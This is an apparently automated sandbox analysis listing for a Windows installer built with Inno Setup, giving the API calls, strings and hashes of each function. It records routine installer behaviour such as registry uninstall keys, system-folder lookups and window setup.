Graph for the function at 483a7c not reproduced (original legend: Executed / Not Executed). API calls on its nodes: GetModuleHandleA, GetProcAddress, GetNativeSystemInfo, GetCurrentProcess, GetSystemInfo.
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
                                                                                                    • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
                                                                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
                                                                                                    • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
                                                                                                    • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
                                                                                                    • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483B0D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                                                    • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                                                    • API String ID: 2230631259-2623177817
                                                                                                    • Opcode ID: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
                                                                                                    • Instruction ID: d1db678d6bd555fecb25ccca0b477ef677e73c145b16f55f8d8b06b946339d0c
                                                                                                    • Opcode Fuzzy Hash: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
                                                                                                    • Instruction Fuzzy Hash: 7F1181C0204741A4DA00BFB94D45B6F65889B11F2AF040C7B6840AA287EABCEF44A76E

                                                                                                    Control-flow Graph (function at 468d88; graph image omitted)
                                                                                                    APIs
                                                                                                      • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                    • RegCloseKey.ADVAPI32(?,00468FA2,?,?,00000001,00000000,00000000,00468FBD,?,00000000,00000000,?), ref: 00468F8B
                                                                                                    Strings
                                                                                                    • Inno Setup: Setup Type, xrefs: 00468E9A
                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468DE7
                                                                                                    • Inno Setup: Deselected Components, xrefs: 00468ECC
                                                                                                    • Inno Setup: User Info: Name, xrefs: 00468F47
                                                                                                    • Inno Setup: Selected Components, xrefs: 00468EAA
                                                                                                    • Inno Setup: Selected Tasks, xrefs: 00468EF7
                                                                                                    • Inno Setup: No Icons, xrefs: 00468E73
                                                                                                    • %s\%s_is1, xrefs: 00468E05
                                                                                                    • Inno Setup: User Info: Organization, xrefs: 00468F5A
                                                                                                    • Inno Setup: Deselected Tasks, xrefs: 00468F19
                                                                                                    • Inno Setup: Icon Group, xrefs: 00468E66
                                                                                                    • Inno Setup: User Info: Serial, xrefs: 00468F6D
                                                                                                    • Inno Setup: App Path, xrefs: 00468E4A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpen
                                                                                                    • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                    • API String ID: 47109696-1093091907
                                                                                                    • Opcode ID: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
                                                                                                    • Instruction ID: 069c4cdb4b1287edb5c1b702bebeb6c44c7684ad2aa17a57d1fdfe9a2539746b
                                                                                                    • Opcode Fuzzy Hash: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
                                                                                                    • Instruction Fuzzy Hash: 6B51A330A006449BCB15DB65D881BDEB7F5EB48304F50857EE840AB391EB79AF01CB59

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 0042D898: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00453DB4,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5), ref: 0042D8AB
                                                                                                      • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                      • Part of subcall function 0042D8F0: GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                                                                      • Part of subcall function 0042D8F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                                                                    • SHGetKnownFolderPath.SHELL32(00499D30,00008000,00000000,?,00000000,0047C942), ref: 0047C846
                                                                                                    • CoTaskMemFree.OLE32(?,0047C88B), ref: 0047C87E
                                                                                                      • Part of subcall function 0042D208: GetEnvironmentVariableA.KERNEL32(00000000,00000000,00000000,?,?,00000000,0042DA3E,00000000,0042DAD0,?,?,?,0049B628,00000000,00000000), ref: 0042D233
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Directory$AddressEnvironmentFolderFreeHandleKnownModulePathProcSystemTaskVariableWindows
                                                                                                    • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                                    • API String ID: 3771764029-544719455
                                                                                                    • Opcode ID: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
                                                                                                    • Instruction ID: 88e29a10730232d74bbdb0c5b7d00c3ea12cf2700f44d19641833b453bfd909d
                                                                                                    • Opcode Fuzzy Hash: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
                                                                                                    • Instruction Fuzzy Hash: 1461CF74A00204AFDB10EBA5D8C2A9E7B69EB44319F90C47FE404A7392DB3C9A44CF5D

                                                                                                    Control-flow Graph (function at 423874; graph image omitted)
                                                                                                    APIs
                                                                                                      • Part of subcall function 0041F3C4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                                                                    • GetClassInfoA.USER32(00400000,0042367C), ref: 0042389F
                                                                                                    • RegisterClassA.USER32(00499630), ref: 004238B7
                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 004238D9
                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 004238E8
                                                                                                    • SetWindowLongA.USER32(00410460,000000FC,0042368C), ref: 00423944
                                                                                                    • SendMessageA.USER32(00410460,00000080,00000001,00000000), ref: 00423965
                                                                                                    • GetSystemMenu.USER32(00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 00423970
                                                                                                    • DeleteMenu.USER32(00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 0042397F
                                                                                                    • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042398C
                                                                                                    • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239A2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                                                    • String ID: |6B
                                                                                                    • API String ID: 183575631-3009739247
                                                                                                    • Opcode ID: 0318a091630d13b60d0a3e6aa49d41dd0f32c1053a4a49f7651c07b17dd5309d
                                                                                                    • Instruction ID: 5979ac727d64f3fe5c9a0a43452729076f54e0f9e4c251b9a4c28f9d6bed272f
                                                                                                    • Opcode Fuzzy Hash: 0318a091630d13b60d0a3e6aa49d41dd0f32c1053a4a49f7651c07b17dd5309d
                                                                                                    • Instruction Fuzzy Hash: E63152B17402006AEB10AF69DC82F6A37989B14709F60017BFA44EF2D7C6BDED40876D

                                                                                                    Control-flow Graph (function at 47ce78; graph image omitted)
                                                                                                    APIs
                                                                                                    • GetProcAddress.KERNEL32(6EA10000,SHGetFolderPathA), ref: 0047CF7A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc
                                                                                                    • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$]xI$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
                                                                                                    • API String ID: 190572456-256906917
                                                                                                    • Opcode ID: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
                                                                                                    • Instruction ID: ec9c61b31d03a4d18d2fa5da2167344019e511a33ceb5cf80618cf604467b355
                                                                                                    • Opcode Fuzzy Hash: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
                                                                                                    • Instruction Fuzzy Hash: 20311D30E001499BCB10EFA5D5D1ADEB7B5EF44308F50847BE504E7281D778AE458B6D

                                                                                                    Control-flow Graph (function at 40631c; graph image omitted)
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                                                    • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModulePolicyProcess
                                                                                                    • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                                    • API String ID: 3256987805-3653653586
                                                                                                    • Opcode ID: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                                                                    • Instruction ID: 935c6a5f7b98c90e27654dc67135d8c1f882d2ad5d8c1b9d0efaf55941893a49
                                                                                                    • Opcode Fuzzy Hash: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                                                                    • Instruction Fuzzy Hash: 97E02D90380702ACEA1032B20D82F3B144C9B54B69B26543B7D56B51C7D9BDDD7059BD
                                                                                                    APIs
                                                                                                    • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                                                                    • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                                                                    • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                                                                    • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                                                                    • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                     • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                     • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                     • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                     • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LongWindow$Prop
                                                                                                    • String ID: 3A$yA
                                                                                                    • API String ID: 3887896539-3278460822
                                                                                                    • Opcode ID: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                                                                    • Instruction ID: bcb4e109f9bb3244d1d15a250a8b19338fc20a7c4ef9bfc7c396c8b3ff51cb63
                                                                                                    • Opcode Fuzzy Hash: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                                                                    • Instruction Fuzzy Hash: 8C22D06508E3C05FE31B9B74896A5D57FA0EE13325B1D45DFC4C28B1A3D21E8A8BC71A

                                                                                                     Control-flow Graph (function at 00467180; rendered graph omitted, legend: Executed / Not Executed)
                                                                                                     • 467180-46722a: call 41461c, call 41463c, call 41461c, call 41463c, SHGetFileInfo -> 46725f, 46722c
                                                                                                     • 46722c-467233 -> 46725f, 467235
                                                                                                     • 467235-46725a: ExtractIconA, call 4670c0 -> 46725f
                                                                                                     • 46725f-46726a: call 478e04 -> 46726c, 4672bb
                                                                                                     • 46726c-4672b1: call 42c3fc, call 40357c, call 403738, ExtractIconA, call 4670c0 -> 4672b6
                                                                                                     • 4672b6 -> 46733d
                                                                                                     • 4672bb-4672ce: call 47d33c -> 4672d0, 4672df
                                                                                                     • 4672d0-4672da: call 47d33c -> 4672df
                                                                                                     • 4672df-4672e3 -> 4672e5, 46733d
                                                                                                     • 4672e5-467308: call 403738, SHGetFileInfo -> 46733d, 46730a
                                                                                                     • 46730a-467311 -> 46733d, 467313
                                                                                                     • 467313-467338: ExtractIconA, call 4670c0 -> 46733d
                                                                                                     • 46733d-467371: call 403400 * 2 (exit)
                                                                                                    APIs
                                                                                                    • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
                                                                                                    • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
                                                                                                      • Part of subcall function 004670C0: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00467158
                                                                                                      • Part of subcall function 004670C0: DestroyCursor.USER32(00000000), ref: 0046716E
                                                                                                    • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
                                                                                                    • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00467301
                                                                                                    • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467327
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                     • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                     • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                     • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                     • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                                                    • String ID: c:\directory$shell32.dll$%H
                                                                                                    • API String ID: 3376378930-166502273
                                                                                                    • Opcode ID: d7a251f7ede599729126a20c6e5bc656e487c76ea0efebb03c6af550fa195c4c
                                                                                                    • Instruction ID: 732e1a1751fb8a235258c93266195bfa595ebd68417bad8a6af0601d960a2915
                                                                                                    • Opcode Fuzzy Hash: d7a251f7ede599729126a20c6e5bc656e487c76ea0efebb03c6af550fa195c4c
                                                                                                    • Instruction Fuzzy Hash: 8A516070604244AFD710DF65CD8AFDFB7A8EB48308F1081A6F80897351D6789E81DA59
                                                                                                    APIs
                                                                                                    • GetActiveWindow.USER32 ref: 0042F58F
                                                                                                    • GetFocus.USER32 ref: 0042F597
                                                                                                    • RegisterClassA.USER32(004997AC), ref: 0042F5B8
                                                                                                    • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F68C,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F5F6
                                                                                                    • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F63C
                                                                                                    • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F64D
                                                                                                    • SetFocus.USER32(00000000,00000000,0042F66F,?,?,?,00000001,00000000,?,00458352,00000000,0049B628), ref: 0042F654
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                     • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                     • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                     • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                     • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                                                    • String ID: TWindowDisabler-Window
                                                                                                    • API String ID: 3167913817-1824977358
                                                                                                    • Opcode ID: d82bdac47665a0423d7aef7e4f95abac113c6b4ba7ee72313a02f6ddbd37ff30
                                                                                                    • Instruction ID: c3989f54cd535b42bfd745bd8d6279a550c1ea008e6f4be51b2d228796931bcd
                                                                                                    • Opcode Fuzzy Hash: d82bdac47665a0423d7aef7e4f95abac113c6b4ba7ee72313a02f6ddbd37ff30
                                                                                                    • Instruction Fuzzy Hash: B021A170740710BAE310EF66AD43F1A76B8EB04B44F91853BF604AB2E1D7B86D0586AD
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
                                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
                                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                     • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                     • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                     • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                     • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                                    • API String ID: 1646373207-2130885113
                                                                                                    • Opcode ID: d7661fd9f0913dad122060e2c1ded37189c483bc636f4dff06c0b7ded89dfa78
                                                                                                    • Instruction ID: a781b9bdaab79611976bfea65fa4e072d6e85bd62b4b6e26dfe65079d72397a7
                                                                                                    • Opcode Fuzzy Hash: d7661fd9f0913dad122060e2c1ded37189c483bc636f4dff06c0b7ded89dfa78
                                                                                                    • Instruction Fuzzy Hash: EA01D470240B00FED301AF63AD12F663A58D7557ABF6044BBFC14965C2C77C4A088E6D
                                                                                                    APIs
                                                                                                    • RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430948
                                                                                                    • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 00430957
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00430971
                                                                                                    • GlobalAddAtomA.KERNEL32(00000000), ref: 00430992
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                     • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                     • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                     • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                     • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                                                    • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                                                    • API String ID: 4130936913-2943970505
                                                                                                    • Opcode ID: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
                                                                                                    • Instruction ID: 0bd92e6c8c1c5a5b8444157758b44b4e11dae02c37acc47d2edddbd1fb793b69
                                                                                                    • Opcode Fuzzy Hash: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
                                                                                                    • Instruction Fuzzy Hash: 22F012B0458340DEE300EB65994271E7BD0EF58718F50467FF498A6392D7795904CB5F
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C,00000000), ref: 004551BA
                                                                                                    • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C), ref: 004551C7
                                                                                                      • Part of subcall function 00454F7C: WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
                                                                                                      • Part of subcall function 00454F7C: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
                                                                                                      • Part of subcall function 00454F7C: GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
                                                                                                      • Part of subcall function 00454F7C: CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                     • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                     • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                     • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
